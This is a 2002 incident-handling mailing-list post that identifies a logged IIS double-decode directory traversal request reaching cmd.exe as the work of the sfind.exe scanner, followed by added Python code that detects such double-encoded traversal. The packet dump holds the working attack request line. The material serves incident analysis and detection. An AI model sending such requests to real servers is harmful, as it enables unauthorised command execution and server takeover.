Re: Unicode worm?

From: pj@esec.dk
Date: 08/23/02


To: "'incidents@securityfocus.com'" <incidents@securityfocus.com>
From: pj@esec.dk
Date: Fri, 23 Aug 2002 13:43:25 +0200


I think the single-request attack you describe corresponds to this payload:

06/17/02-18:12:39.590684 192.84.105.44:2468 -> X.X.X.X:80
TCP TTL:108 TOS:0x0 ID:3615 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0xC14916B Ack: 0xC6B3FB9C Win: 0x40B0 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
32 35 35 63 25 32 35 35 63 2E 2E 2F 77 69 6E 6E 255c%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 0D 0A xe?/c+dir..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

If Unicode translation is applied, %255c%255c is seen as %5c%%5c.

This request is sent by the unicode option of the sfind.exe tool. Sfind.exe
originates from China; I have seen it used in different toolkits for
semi-automated establishment of Warez "FXP" servers on vulnerable IIS
servers, see http://www.esec.dk/pubstro.pdf

best regards
Peter Jelver
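
One way to recognise this double-decoding on the defender's side, as an added example that is not part of the original post or of sfind.exe: decode the request path repeatedly until it stops changing, then inspect the canonical form for traversal. The sample request is copied from the capture above; everything else is constructed.

```python
"""Flag double-URL-encoded path traversal such as ``..%255c%255c..`` by
percent-decoding a request path until it reaches a fixpoint, then checking
the canonical path for ".." segments. Constructed example code."""
from urllib.parse import unquote

MAX_ROUNDS = 5  # stop runaway decoding on pathological inputs


def decode_until_stable(path: str) -> tuple[list[str], int]:
    """Return every decoding stage of ``path`` and how many rounds were needed.

    Stage 0 is the raw path; each later stage is one more percent-decode.
    ``%255c`` becomes ``%5c`` after round 1 and a backslash after round 2.
    """
    stages = [path]
    for _ in range(MAX_ROUNDS):
        nxt = unquote(stages[-1])
        if nxt == stages[-1]:
            break
        stages.append(nxt)
    return stages, len(stages) - 1


def is_traversal(request_target: str) -> dict:
    """Classify a request-target and return the verdict plus the evidence."""
    path = request_target.split("?", 1)[0]      # query string is not path
    stages, rounds = decode_until_stable(path)
    canonical = stages[-1].replace("\\", "/")   # IIS accepts \ as a separator
    segments = canonical.split("/")
    return {
        "traversal": ".." in segments,   # a ".." segment escapes the directory
        "double_encoded": rounds > 1,    # needed more than one decode round
        "canonical": canonical,
        "stages": stages,
    }


if __name__ == "__main__":
    # Request-target taken from the packet dump in the post above.
    sample = "/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"
    verdict = is_traversal(sample)
    for i, stage in enumerate(verdict["stages"]):
        print(f"decode round {i}: {stage}")
    print("traversal:", verdict["traversal"],
          "double_encoded:", verdict["double_encoded"])
```

A request that is flagged as both traversal and double_encoded should not reach the file system at all; the stages list shows a reviewer exactly which decode round exposed the `..` segment.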

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com